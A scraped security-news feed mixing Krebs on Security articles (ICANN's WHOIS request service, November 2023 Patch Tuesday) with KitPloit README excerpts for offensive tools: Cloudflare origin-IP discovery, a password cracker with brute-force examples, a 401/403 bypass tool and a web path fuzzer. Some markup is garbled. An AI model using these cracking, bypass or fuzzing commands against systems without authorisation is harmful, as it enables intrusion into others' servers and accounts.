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☐ ☆ ✇ KitPloit - PenTest Tools!

CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R — December 8th 2023 at 11:30

CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.

Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.


infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
- Still in the development phase, sometimes it can't detect the real Ip.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone
    cd CloakQuest3r
    pip3 install -r requirements.txt
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on :

☐ ☆ ✇ Krebs on Security

ICANN Launches Service to Help With WHOIS Lookups

By: BrianKrebs — December 6th 2023 at 15:51

More than five years after domain name registrars started redacting personal data from all public domain registration records, the non-profit organization overseeing the domain industry has introduced a centralized online service designed to make it easier for researchers, law enforcement and others to request the information directly from registrars.

In May 2018, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — instructed all registrars to redact the customer’s name, address, phone number and email from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges.

ICANN made the policy change in response to the General Data Protection Regulation (GDPR), a law enacted by the European Parliament that requires companies to gain affirmative consent for any personal information they collect on people within the European Union. In the meantime, registrars were to continue collecting the data but not publish it, and ICANN promised it would develop a system that facilitates access to this information.

At the end of November 2023, ICANN launched the Registration Data Request Service (RDRS), which is designed as a one-stop shop to submit registration data requests to participating registrars. This video from ICANN walks through how the system works.

Accredited registrars don’t have to participate, but ICANN is asking all registrars to join and says participants can opt out or stop using it at any time. ICANN contends that the use of a standardized request form makes it easier for the correct information and supporting documents to be provided to evaluate a request.

ICANN says the RDRS doesn’t guarantee access to requested registration data, and that all communication and data disclosure between the registrars and requestors takes place outside of the system. The service can’t be used to request WHOIS data tied to country-code top level domains (CCTLDs), such as those ending in .de (Germany) or .nz (New Zealand), for example.

The RDRS portal.

As Catalin Cimpanu writes for Risky Business News, currently investigators can file legal requests or abuse reports with each individual registrar, but the idea behind the RDRS is to create a place where requests from “verified” parties can be honored faster and with a higher degree of trust.

The registrar community generally views public WHOIS data as a nuisance issue for their domain customers and an unwelcome cost-center. Privacy advocates maintain that cybercriminals don’t provide their real information in registration records anyway, and that requiring WHOIS data to be public simply causes domain registrants to be pestered by spammers, scammers and stalkers.

Meanwhile, security experts argue that even in cases where online abusers provide intentionally misleading or false information in WHOIS records, that information is still extremely useful in mapping the extent of their malware, phishing and scamming operations. What’s more, the overwhelming majority of phishing is performed with the help of compromised domains, and the primary method for cleaning up those compromises is using WHOIS data to contact the victim and/or their hosting provider.

Anyone looking for copious examples of both need only to search this Web site for the term “WHOIS,” which yields dozens of stories and investigations that simply would not have been possible without the data available in the global WHOIS records.

KrebsOnSecurity remains doubtful that participating registrars will be any more likely to share WHOIS data with researchers just because the request comes through ICANN. But I look forward to being wrong on this one, and will certainly mention it in my reporting if the RDRS proves useful.

Regardless of whether the RDRS succeeds or fails, there is another European law that takes effect in 2024 which is likely to place additional pressure on registrars to respond to legitimate WHOIS data requests. The new Network and Information Security Directive (NIS2), which EU member states have until October 2024 to implement, requires registrars to keep much more accurate WHOIS records, and to respond within as little as 24 hours to WHOIS data requests tied everything from phishing, malware and spam to copyright and brand enforcement.

☐ ☆ ✇ KitPloit - PenTest Tools!

PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R — December 6th 2023 at 11:30

PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks. 


  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks


  1. Clone the repository:

    git clone
  2. Install the required dependencies:

    pip install -r requirements.txt


python <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.


  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.

Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım örneği:

Usage Examples

Wordlist-based Password Cracking

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

Brute Force Attack

python 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

Password Complexity Evaluation

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

Using Salt Value

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

Parallel Processing

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.


This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.


Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.


If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:


PassBreaker is released under the MIT License. See LICENSE for more information.

☐ ☆ ✇ KitPloit - PenTest Tools!

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R — December 4th 2023 at 11:30

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.

Search for c2 servers based on netlas (8)


To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t -p 443 -s 1234567890abcdef


To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>


To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \


To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.


Name Support
Cobalt Strike


  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support


If you'd like to contribute to this project, please feel free to create a pull request.


This project is licensed under the License - see the LICENSE file for details.

☐ ☆ ✇ – The Hackers Arsenal Tools Portal

GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

By: NJ Ouchn — November 29th 2023 at 11:12
We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they
☐ ☆ ✇ – The Hackers Arsenal Tools Portal

Black Hat Arsenal 2024 Next Stop Singapore !

By: NJ Ouchn — November 28th 2023 at 10:25
Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up
☐ ☆ ✇ The Hacker News

How to Handle Retail SaaS Security on Cyber Monday

By: The Hacker News — November 27th 2023 at 17:57
If forecasters are right, over the course of today, consumers will spend&nbsp;$13.7 billion. Just about every click, sale, and engagement will be captured by a CRM platform. Inventory applications will trigger automated re-orders; communication tools will send automated email and text messages confirming sales and sharing shipping information.&nbsp; SaaS applications supporting retail efforts
☐ ☆ ✇ The Hacker News

Tell Me Your Secrets Without Telling Me Your Secrets

By: The Hacker News — November 24th 2023 at 10:53
The title of this article probably sounds like the caption to a meme. Instead, this is an actual problem GitGuardian's engineers had to solve in implementing the mechanisms for their new HasMySecretLeaked service. They wanted to help developers find out if their secrets (passwords, API keys, private keys, cryptographic certificates, etc.) had found their way into public GitHub repositories. How
☐ ☆ ✇ KitPloit - PenTest Tools!

ICS-Forensics-Tools - Microsoft ICS Forensics Framework

By: Zion3R — November 23rd 2023 at 11:30

Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.

Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

git clone



  • Install python requirements

    pip install -r requirements.txt


General application arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
-s, --save-config Save config file for easy future usage Optional
-c, --config Config file path, default is config.json Optional
-o, --output-dir Directory in which to output any generated files, default is output Optional
-v, --verbose Log output to a file as well as the console Optional
-p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

Specific plugin arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
--ip Addresses file path, CIDR or IP addresses csv (ip column required).
add more columns for additional info about each ip (username, pass, etc...)
--port Port number Optional
--transport tcp/udp Optional
--analyzer Analyzer name to run Optional

Executing examples in the command line

 python -s -v PluginName --ip ips.csv
python -s -v PluginName --analyzer AnalyzerName
python -s -v -c config.json --multiprocess

Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig
forensic = ForensicClient()
plugin = PluginConfig.from_json({
"name": "PluginName",
"port": 123,
"transport": "tcp",
"addresses": [{"ip": ""}, {"ip": ""}],
"parameters": {
"analyzers": []


Adding Plugins

When developing locally make sure to mark src folder as "Sources root"

  • Create new directory under plugins folder with your plugin name
  • Create new Python file with your plugin name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport

class GeneralCLI(PluginCLI):
def __init__(self, folder_name):
super().__init__(folder_name) = "General"
self.description = "General Plugin Description"
self.port = 123
self.transport = Transport.TCP

def flags(self, parser):
self.base_flags(parser, self.port, self.transport)
parser.add_argument('--general', help='General additional argument', metavar="")

class General(PluginInterface):
def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)

def connect(self, address):"{} connect")

def export(self, extracted):"{} export")
  • Make sure to import your new plugin in the file under the plugins folder
  • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
    there are 2 mandatory functions (connect, export).
    the connect function receives single ip address and extracts any relevant information from the device and return it.
    the export function receives the information that was extracted from all the devices and there you can export it to file.
  • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
    there is a single mandatory function (flags).
    In which you must call base_flags, and you can add any additional flags that you want to have.

Adding Analyzers

  • Create new directory under analyzers folder with the plugin name that related to your analyzer.
  • Create new Python file with your analyzer name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig

class General(AnalyzerInterface):
def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)
self.plugin_name = 'General'

def analyze(self):
  • Make sure to import your new analyzer in the file under the analyzers folder

Resources and Technical data & solution:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube


This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact with any additional questions or comments.


This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.

☐ ☆ ✇ The Hacker News

Play Ransomware Goes Commercial - Now Offered as a Service to Cybercriminals

By: Newsroom — November 21st 2023 at 13:56
The ransomware strain known as Play is now being offered to other threat actors "as a service," new evidence unearthed by Adlumin has revealed. "The unusual lack of even small variations between attacks suggests that they are being carried out by affiliates who have purchased the ransomware-as-a-service (RaaS) and are following step-by-step instructions from playbooks delivered with it," the
☐ ☆ ✇ The Hacker News

NetSupport RAT Infections on the Rise - Targeting Government and Business Sectors

By: Newsroom — November 20th 2023 at 15:19
Threat actors are targeting the education, government and business services sectors with a remote access trojan called NetSupport RAT. "The delivery mechanisms for the NetSupport RAT encompass fraudulent updates, drive-by downloads, utilization of malware loaders (such as GHOSTPULSE), and various forms of phishing campaigns," VMware Carbon Black researchers said in a report shared with The
☐ ☆ ✇ Krebs on Security

Microsoft Patch Tuesday, November 2023 Edition

By: BrianKrebs — November 14th 2023 at 23:00

Microsoft today released updates to fix more than five dozen security holes in its Windows operating systems and related software, including three “zero day” vulnerabilities that Microsoft warns are already being exploited in active attacks.

The zero-day threats targeting Microsoft this month include CVE-2023-36025, a weakness that allows malicious content to bypass the Windows SmartScreen Security feature. SmartScreen is a built-in Windows component that tries to detect and block malicious websites and files. Microsoft’s security advisory for this flaw says attackers could exploit it by getting a Windows user to click on a booby-trapped link to a shortcut file.

Kevin Breen, senior director of threat research at Immersive Labs, said emails with .url attachments or logs with processes spawning from .url files “should be a high priority for threat hunters given the active exploitation of this vulnerability in the wild.”

The second zero day this month is CVE-2023-36033, which is a vulnerability in the “DWM Core Library” in Microsoft Windows that was exploited in the wild as a zero day and publicly disclosed prior to patches being available. It affects Microsoft Windows 10 and later, as well as Microsoft Windows Server 2019 and subsequent versions.

“This vulnerability can be exploited locally, with low complexity and without needing high-level privileges or user interaction,” said Mike Walters, president and co-founder of the security firm Action1. “Attackers exploiting this flaw could gain SYSTEM privileges, making it an efficient method for escalating privileges, especially after initial access through methods like phishing.”

The final zero day in this month’s Patch Tuesday is a problem in the “Windows Cloud Files Mini Filter Driver” tracked as CVE-2023-36036 that affects Windows 10 and later, as well as Windows Server 2008 at later. Microsoft says it is relatively straightforward for attackers to exploit CVE-2023-36036 as a way to elevate their privileges on a compromised PC.

Beyond the zero day flaws, Breen said organizations running Microsoft Exchange Server should prioritize several new Exchange patches, including CVE-2023-36439, which is a bug that would allow attackers to install malicious software on an Exchange server. This weakness technically requires the attacker to be authenticated to the target’s local network, but Breen notes that a pair of phished Exchange credentials will provide that access nicely.

“This is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other vulnerable internal targets – just because your Exchange Server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said.

Breen said this vulnerability goes hand in hand with three other Exchange bugs that Microsoft designated as “exploitation more likely:” CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035.

Finally, the SANS Internet Storm Center points to two additional bugs patched by Microsoft this month that aren’t yet showing signs of active exploitation but that were made public prior to today and thus deserve prioritization. Those include: CVE-2023-36038, a denial of service vulnerability in ASP.NET Core, with a CVSS score of 8.2; and CVE-2023-36413: A Microsoft Office security feature bypass. Exploiting this vulnerability will bypass the protected mode when opening a file received via the web.

Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

☐ ☆ ✇ KitPloit - PenTest Tools!

Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

By: Zion3R — November 14th 2023 at 11:30

Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

  • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
  • Utilizes various methods and headers to test and bypass access controls.
  • Customizable through command-line arguments.

Install requirements

pip3 install -r requirements.txt

Run the script

python3 -u

Forbidden Buster accepts the following arguments:

fuzzing (stressful) --include-user-agent Include User-Agent fuzzing (stressful)" dir="auto">
  -h, --help            show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)

Example Usage:

python3 --url "" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "" --rate-limit 5 --include-unicode --include-user-agent

  • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
  • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
  • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.

☐ ☆ ✇ KitPloit - PenTest Tools!

CryptoChat - Beyond Secure Messaging

By: Zion3R — November 11th 2023 at 11:30

Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

  1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
  2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
  3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
  4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
  5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
  6. Group Chats: Have encrypted conversations with multiple people at once.

  • Python 3.x
  • cryptography
  • colorama

  1. Clone the repository:

    git clone
  2. Navigate to the project directory:

    cd CryptoChat
  3. Install the required dependencies:

    pip install -r requirements.txt

bind the server to. --port PORT The port number to bind the server to. -------------------------------------------------------------------------- $ python3 --help usage: [-h] [--host HOST] [--port PORT] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The server's IP address. --port PORT The port number of the server." dir="auto">
$ python3 --help
usage: [-h] [--host HOST] [--port PORT]

Start the chat server.

-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
$ python3 --help
usage: [-h] [--host HOST] [--port PORT]

Connect to the chat server.

-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.

secret key for encryption. (Default=mysecretpassword) -------------------------------------------------------------------------- $ python3 --help usage: [-h] [--host HOST] [--port PORT] [--key KEY] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The IP address to bind the server to. (Default= --port PORT The port number to bind the server to. (Default=12345) --key KEY The secret key for encryption. (Default=mysecretpassword)" dir="auto">
$ python3 --help
usage: [-h] [--host HOST] [--port PORT] [--key KEY]

Start the chat server.

-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
$ python3 --help
usage: [-h] [--host HOST] [--port PORT] [--key KEY]

Connect to the chat server.

-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encr yption. (Default=mysecretpassword)
  • --help: show this help message and exit
  • --host: The IP address to bind the server.
  • --port: The port number to bind the server.
  • --key : The secret key for encryption

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:

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Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R — November 10th 2023 at 11:30

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2


git clone
cd Afuzz
python install


pip install afuzz


afuzz -u -t 30



| |
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| | admin | 301 | | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| | .idea | 301 | | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |


"result": [
"target": "",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": "admin",
"status": 301,
"redirect": "",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "",
"depth": 0,
"url": ""
"target": "",
"path": ".idea",
"status": 301,
"redirect": "",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "",
"depth": 0,
"url": ""
"total": 12,
"targe t": ""

Wordlists (IMPORTANT)


  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%


  • Normal extensions

Passing asp and aspx extensions will generate the following dictionary:

  • host

Passing and php extension will genrate the following dictionary:


    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######

usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (

-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3


The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50


The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

